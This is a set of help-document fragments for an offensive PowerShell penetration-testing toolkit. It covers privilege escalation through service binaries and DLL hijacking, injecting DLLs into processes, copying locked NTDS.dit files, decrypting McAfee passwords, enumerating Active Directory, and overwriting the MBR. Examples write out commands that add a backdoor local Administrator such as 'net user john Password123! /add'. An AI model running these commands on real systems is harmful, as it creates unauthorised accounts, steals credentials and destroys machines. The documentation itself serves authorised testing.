 ## PARAMETERS
 .
 ### -ComputerName
 Specifies the system to remove a \\\\ComputerName\IPC$ connection for.
 .
 ```yaml
 Type: String[]
 Parameter Sets: ComputerName
 Aliases: HostName, dnshostname, name
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Path
 Specifies the remote \\\\UNC\path to remove the connection for.
 .
 ```yaml
 Type: String[]
 Parameter Sets: Path
 Aliases:
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Write-ServiceBinary.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Write-ServiceBinary.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
 [-Credential <PSCredential>] [-Command <String>] [-Path <String>]
 ```
 .
 ## DESCRIPTION
 Takes a pre-compiled C# service binary and patches in the appropriate commands needed
 for service abuse.
 If a -UserName/-Password or -Credential is specified, the command
 patched in creates a local user and adds them to the specified -LocalGroup, otherwise
 the specified -Command is patched in.
 The binary is then written out to the specified
 -ServicePath.
 Either -Name must be specified for the service, or a proper object from
 Get-Service must be passed on the pipeline in order to patch in the appropriate service
 name the binary will be running under.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Write-ServiceBinary -Name VulnSVC
 ```
 .
 Writes a service binary to service.exe in the local directory for VulnSVC that
 adds a local Administrator (john/Password123!).
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Service VulnSVC | Write-ServiceBinary
 ```
 .
 Writes a service binary to service.exe in the local directory for VulnSVC that
 adds a local Administrator (john/Password123!).
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
 ```
 .
 Writes a service binary to service.exe in the local directory for VulnSVC that adds
 TESTLAB\john to the Administrators local group.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```
 Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
 ```
 .
 Writes a service binary to service.exe in the local directory for VulnSVC that
 adds a local Administrator (backdoor/Password123!).
 .
 ### -------------------------- EXAMPLE 5 --------------------------
 ```
 Write-ServiceBinary -Name VulnSVC -Command "net ..."
 ```
 .
 Writes a service binary to service.exe in the local directory for VulnSVC that
 executes a custom command.
 .
 ## PARAMETERS
 .
 ### -Name
 The service name the EXE will be running under.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: ServiceName
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -UserName
 The \[domain\\\]username to add.
 If not given, it defaults to "john".
 Domain users are not created, only added to the specified localgroup.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: John
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Password
 The password to set for the added user.
 If not given, it defaults to "Password123!"
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: Password123!
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -LocalGroup
 Local group name to add the user to (default of 'Administrators').
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: Administrators
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Credential
 A \[Management.Automation.PSCredential\] object specifying the user/password to add.
 .
 ```yaml
 Type: PSCredential
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: [Management.Automation.PSCredential]::Empty
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Command
 Custom command to execute instead of user creation.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Path
 Path to write the binary out to, defaults to 'service.exe' in the local directory.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: "$(Convert-Path .)\service.exe"
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.ServiceBinary
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Mayhem/Set-CriticalProcess.md
Copyright: __NO_COPYRIGHT__ in: docs/Mayhem/Set-CriticalProcess.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
 ```
 .
 ## DESCRIPTION
 {{Fill in the Description}}
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Set-CriticalProcess
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Set-CriticalProcess -ExitImmediately
 ```
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Set-CriticalProcess -Force -Verbose
 ```
 .
 ## PARAMETERS
 .
 ### -Force
 Set the running PowerShell process as critical without asking for confirmation.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ExitImmediately
 Immediately exit PowerShell after successfully marking the process as critical.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -WhatIf
 Shows what would happen if the cmdlet runs.
 The cmdlet is not run.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases: wi
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Confirm
 Prompts you for confirmation before running the cmdlet.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases: cf
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     Exfiltration/Invoke-NinjaCopy.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Invoke-NinjaCopy.ps1
License:   __UNKNOWN__
 The source code is also available with the distribution of this script.
 License: GPLv3 or later
 Required Dependencies: None
 Optional Dependencies: None
 .
 .DESCRIPTION
 .
 Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. This bypasses file DACL's,
 read handle locks, and SACL's. You must be an administrator to run the script. This can be used to read SYSTEM files which are normally
 locked, such as the NTDS.dit file or registry hives.
 .
 .PARAMETER Path
 .
 The full path of the file to copy (example: c:\filedir\file.txt)
 .
 .PARAMETER LocalDestination
 .
 Optional, a file path to copy the file to on the local computer. If this isn't used, RemoteDestination must be specified.
 .
 .PARAMETER RemoteDestination
 .
 Optional, a file path to copy the file to on the remote computer. If this isn't used, LocalDestination must be specified.
 .
 .PARAMETER BufferSize
 .
 Optional, how many bytes to read at a time from the file. The default is 5MB.
 .
 PowerShell will allocate a Byte[] equal to the size of this buffer, so setting this too high can cause PowerShell to use a LOT of RAM. It's
 your job to figure out what "too high" is for your situation.
 .
 .PARAMETER ComputerName
 .
 Optional, an array of computernames to run the script on.
 .
 .EXAMPLE
 .
 Read the file ntds.dit from a remote server and write it to c:\test\ntds.dit on the local server

Files:     docs/Privesc/Set-ServiceBinaryPath.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Set-ServiceBinaryPath.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Set-ServiceBinaryPath [-Name] <String[]> [-Path] <String>
 ```
 .
 ## DESCRIPTION
 Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
 service handle to the service with ConfigControl access using the GetServiceHandle
 Win32 API call.
 ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
 to the string value specified by binPath, and the handle is closed off.
 .
 Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
 Dacl field to each object.
 It does this by opening a handle with ReadControl for the
 service with using the GetServiceHandle Win32 API call and then uses
 QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
 ```
 .
 Sets the binary path for 'VulnSvc' to be a command to add a user.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
 ```
 .
 Sets the binary path for 'VulnSvc' to be a command to add a user.
 .
 ## PARAMETERS
 .
 ### -Name
 An array of one or more service names to set the binary path for.
 Required.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases: ServiceName
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Path
 The new binary path (lpBinaryPathName) to set for the specified service.
 Required.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: BinaryPath, binPath
 .
 Required: True
 Position: 2
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### System.Boolean
 .
 $True if configuration succeeds, $False otherwise.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Write-HijackDll.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Write-HijackDll.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]
 [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]
 ```
 .
 ## DESCRIPTION
 First builds a self-deleting .bat file that executes the specified -Command or local user,
 to add and writes the.bat out to -BatPath.
 The BatPath is then patched into a pre-compiled
 C++ DLL that is built to be hijackable by the IKEEXT service.
 There are two DLLs, one for
 x86 and one for x64, and both are contained as base64-encoded strings.
 The DLL is then
 written out to the specified OutputFile.
 .
 ## EXAMPLES
 .
 ### Example 1
 ```
 PS C:\> {{ Add example code here }}
 ```
 .
 {{ Add example description here }}
 .
 ## PARAMETERS
 .
 ### -DllPath
 File name to write the generated DLL out to.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Architecture
 The Architecture to generate for the DLL, x86 or x64.
 If not specified, PowerUp
 will try to automatically determine the correct architecture.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 2
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -BatPath
 Path to the .bat for the DLL to launch.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 3
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -UserName
 The \[domain\\\]username to add.
 If not given, it defaults to "john".
 Domain users are not created, only added to the specified localgroup.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 4
 Default value: John
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Password
 The password to set for the added user.
 If not given, it defaults to "Password123!"
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 5
 Default value: Password123!
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -LocalGroup
 Local group name to add the user to (default of 'Administrators').
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 6
 Default value: Administrators
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Credential
 A \[Management.Automation.PSCredential\] object specifying the user/password to add.
 .
 ```yaml
 Type: PSCredential
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 7
 Default value: [Management.Automation.PSCredential]::Empty
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Command
 Custom command to execute instead of user creation.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 8
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.HijackableDLL
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Get-ModifiablePath.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ModifiablePath.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ModifiablePath [-Path] <String[]> [-Literal]
 ```
 .
 ## DESCRIPTION
 Takes a complex path specification of an initial file/folder path with possible
 configuration files, 'tokenizes' the string in a number of possible ways, and
 enumerates the ACLs for each path that currently exists on the system.
 Any path that
 the current user has modification rights on is returned in a custom object that contains
 the modifiable path, associated permission set, and the IdentityReference with the specified
 rights.
 The SID of the current user and any group he/she are a part of are used as the
 comparison set against the parsed path DACLs.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 '"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
 ```
 .
 Path                       Permissions                IdentityReference

Files:     docs/Recon/Get-DomainGPOLocalGroup.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainGPOLocalGroup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainGPOLocalGroup [[-Identity] <String[]>] [-ResolveMembersToSIDs] [-Domain <String>]
 [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
 arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
 group membership is set through Group Policy Preferences groups.xml files.
 For any
 GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
 section data is processed if present.
 Any found Groups.xml files are parsed with
 Get-GroupsXML and those memberships are returned as well.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainGPOLocalGroup
 ```
 .
 Returns all local groups set by GPO along with their members and memberof.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainGPOLocalGroup -ResolveMembersToSIDs
 ```
 .
 Returns all local groups set by GPO along with their members and memberof,
 and resolve any members to their domain SIDs.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 '{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
 ```
 .
 Return any GPO-set groups for the GPO with the given name/GUID.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```
 Get-DomainGPOLocalGroup 'Desktops'
 ```
 .
 Return any GPO-set groups for the GPO with the given display name.
 .
 ### -------------------------- EXAMPLE 5 --------------------------
 ```

Files:     docs/Recon/ConvertFrom-UACValue.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/ConvertFrom-UACValue.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 ConvertFrom-UACValue [-Value] <Int32> [-ShowAll]
 ```
 .
 ## DESCRIPTION
 This function will take an integer that represents a User Account
 Control (UAC) binary blob and will covert it to an ordered
 dictionary with each bitwise value broken out.
 By default only values
 set are displayed- the -ShowAll switch will display all values with
 a + next to the ones set.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 ConvertFrom-UACValue -Value 66176
 ```
 .
 Name                           Value

Files:     CodeExecution/Invoke-DllInjection.ps1
Copyright: __NO_COPYRIGHT__ in: CodeExecution/Invoke-DllInjection.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Invoke-DllInjection injects a Dll into an arbitrary process.
 It does this by using VirtualAllocEx to allocate memory the size of the
 DLL in the remote process, writing the names of the DLL to load into the
 remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
 to invoke LoadLibraryA in the context of the remote process.
 .
 .PARAMETER ProcessID
 .
 Process ID of the process you want to inject a Dll into.
 .
 .PARAMETER Dll
 .
 Name of the dll to inject. This can be an absolute or relative path.
 .
 .EXAMPLE
 .
 Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
 .
 Description

Files:     docs/Privesc/Get-UnquotedService.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-UnquotedService.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-UnquotedService
 ```
 .
 ## DESCRIPTION

Files:     docs/Recon/Get-NetLoggedon.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetLoggedon.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetLoggedon [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will execute the NetWkstaUserEnum Win32API call to query
 a given host for actively logged on users.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetLoggedon
 ```
 .
 Returns users actively logged onto the local host.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-NetLoggedon -ComputerName sqlserver
 ```
 .
 Returns users actively logged onto the 'sqlserver' host.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainComputer | Get-NetLoggedon
 ```
 .
 Returns all logged on users for all computers in the domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     ScriptModification/Remove-Comment.ps1
Copyright: __NO_COPYRIGHT__ in: ScriptModification/Remove-Comment.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Remove-Comment strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
 .
 A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!
 .
 .PARAMETER ScriptBlock
 .
 Specifies a scriptblock containing your script.
 .
 .PARAMETER Path
 .
 Specifies the path to your script.
 .
 .EXAMPLE

Files:     docs/Recon/Get-DomainDNSRecord.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainDNSRecord.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainDNSRecord [-ZoneName] <String> [-Domain <String>] [-Server <String>] [-Properties <String[]>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Given a specific Active Directory DNS zone name, query for all 'dnsNode'
 LDAP entries using that zone as the search base.
 Return all DNS entry results
 and use Convert-DNSRecord to try to convert the binary DNS record blobs.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainDNSRecord -ZoneName testlab.local
 ```
 .
 Retrieve all records for the testlab.local zone.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainDNSZone | Get-DomainDNSRecord
 ```
 .
 Retrieve all records for all zones in the current domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
 ```
 .
 Retrieve all records for all zones in the dev.testlab.local domain.
 .
 ## PARAMETERS
 .
 ### -ZoneName
 Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Domain
 The domain to query for zones, defaults to the current domain.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Server
 Specifies an Active Directory server (domain controller) to bind to for the search.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: DomainController
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Properties
 Specifies the properties of the output object to retrieve from the server.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ResultPageSize
 Specifies the PageSize to set for the LDAP searcher object.
 .
 ```yaml
 Type: Int32
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: 200
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ServerTimeLimit
 Specifies the maximum amount of time the server spends searching.
 Default of 120 seconds.
 .
 ```yaml
 Type: Int32
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: 0
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -FindOne
 Only return one result object.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases: ReturnOne
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Credential
 A \[Management.Automation.PSCredential\] object of alternate credentials
 for connection to the target domain.
 .
 ```yaml
 Type: PSCredential
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: [Management.Automation.PSCredential]::Empty
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerView.DNSRecord
 .
 Outputs custom PSObjects with detailed information about the DNS record entry.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     Recon/Invoke-ReverseDnsLookup.ps1
Copyright: __NO_COPYRIGHT__ in: Recon/Invoke-ReverseDnsLookup.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.
 .
 .PARAMETER IPRange
 .
 Specifies the IP address range. The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. Comma-delimited ranges may can be provided.
 .
 .EXAMPLE
 .
 Invoke-ReverseDnsLookup 74.125.228.0/29
 .
 IP              HostName
 --              --------
 74.125.228.1    iad23s05-in-f1.1e100.net
 74.125.228.2    iad23s05-in-f2.1e100.net
 74.125.228.3    iad23s05-in-f3.1e100.net
 74.125.228.4    iad23s05-in-f4.1e100.net
 74.125.228.5    iad23s05-in-f5.1e100.net
 74.125.228.6    iad23s05-in-f6.1e100.net
 .
 Description

Files:     docs/Privesc/Get-SiteListPassword.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-SiteListPassword.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-SiteListPassword [[-Path] <String[]>]
 ```
 .
 ## DESCRIPTION
 Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
 C:\Documents and Settings\, or C:\Users\.
 For any files found, the appropriate
 credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
 function that takes advantage of McAfee's static key encryption.
 Any decrypted credentials
 are output in custom objects.
 See links for more information.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-SiteListPassword
 ```

Files:     Mayhem/Mayhem.psm1
Copyright: __NO_COPYRIGHT__ in: Mayhem/Mayhem.psm1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Set-MasterBootRecord is proof of concept code designed to show that it is
 possible with PowerShell to overwrite the MBR. This technique was taken
 from a public malware sample. This script is inteded solely as proof of
 concept code.
 .
 .PARAMETER BootMessage
 .
 Specifies the message that will be displayed upon making your computer a brick.
 .
 .PARAMETER RebootImmediately
 .
 Reboot the machine immediately upon overwriting the MBR.
 .
 .PARAMETER Force
 .
 Suppress the warning prompt.
 .
 .EXAMPLE
 .
 Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
 .
 .NOTES
 .
 Obviously, this will only work if you have a master boot record to
 overwrite. This won't work if you have a GPT (GUID partition table).

Files:     docs/Recon/Get-PathAcl.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-PathAcl.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Enumerates the ACL for a specified file/folder path, and translates
 the access rules for each entry into readable formats.
 If -Credential is passed,
 Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-PathAcl "\\SERVER\Share\"
 ```
 .
 Returns ACLs for the given UNC share.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 gci .\test.txt | Get-PathAcl
 ```
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Recon/Get-DomainDFSShare.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainDFSShare.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainDFSShare [[-Domain] <String[]>] [[-SearchBase] <String>] [[-Server] <String>]
 [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>] [-Tombstone]
 [[-Credential] <PSCredential>] [[-Version] <String>]
 ```
 .
 ## DESCRIPTION
 This function searches for all distributed file systems (either version
 1, 2, or both depending on -Version X) by searching for domain objects

Files:     docs/Recon/Invoke-ReverseDnsLookup.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Invoke-ReverseDnsLookup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-ReverseDnsLookup [-IpRange] <String>
 ```
 .
 ## DESCRIPTION
 Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records.
 This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-ReverseDnsLookup 74.125.228.0/29
 ```
 .
 IP              HostName
 --              --------
 74.125.228.1    iad23s05-in-f1.1e100.net
 74.125.228.2    iad23s05-in-f2.1e100.net
 74.125.228.3    iad23s05-in-f3.1e100.net
 74.125.228.4    iad23s05-in-f4.1e100.net
 74.125.228.5    iad23s05-in-f5.1e100.net
 74.125.228.6    iad23s05-in-f6.1e100.net
 .
 Description

Files:     docs/Recon/Get-DomainObjectAcl.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainObjectAcl.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainObjectAcl [[-Identity] <String[]>] [-ResolveGUIDs] [-RightsFilter <String>] [-Domain <String>]
 [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 {{Fill in the Description}}
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
 ```
 .
 Get the ACLs for the matt.admin user in the testlab.local domain and
 resolve relevant GUIDs to their display names.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
 ```
 .
 Enumerate the ACL permissions for all OUs in the domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Enable-Privilege.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Enable-Privilege.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Enable-Privilege [-Privilege] <String[]>
 ```
 .
 ## DESCRIPTION
 Uses RtlAdjustPrivilege to enable a specific privilege for the current process.
 Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege
 can be passed on the pipeline.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ProcessTokenPrivilege
 ```
 .
 Privilege                    Attributes                     ProcessId

Files:     docs/ScriptModification/Out-EncryptedScript.md
Copyright: __NO_COPYRIGHT__ in: docs/ScriptModification/Out-EncryptedScript.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Out-EncryptedScript [-ScriptPath] <String> [-Password] <SecureString> [-Salt] <String>
 [[-InitializationVector] <String>] [[-FilePath] <String>]
 ```
 .
 ## DESCRIPTION
 Out-EncryptedScript will encrypt a script (or any text file for that
 matter) and output the results to a minimally obfuscated script -
 evil.ps1 by default.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Privesc/Get-ServiceDetail.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ServiceDetail.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ServiceDetail [-Name] <String[]>
 ```
 .
 ## DESCRIPTION
 Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
 the pipeline object returned by Get-Service, extracts out the service name, queries the

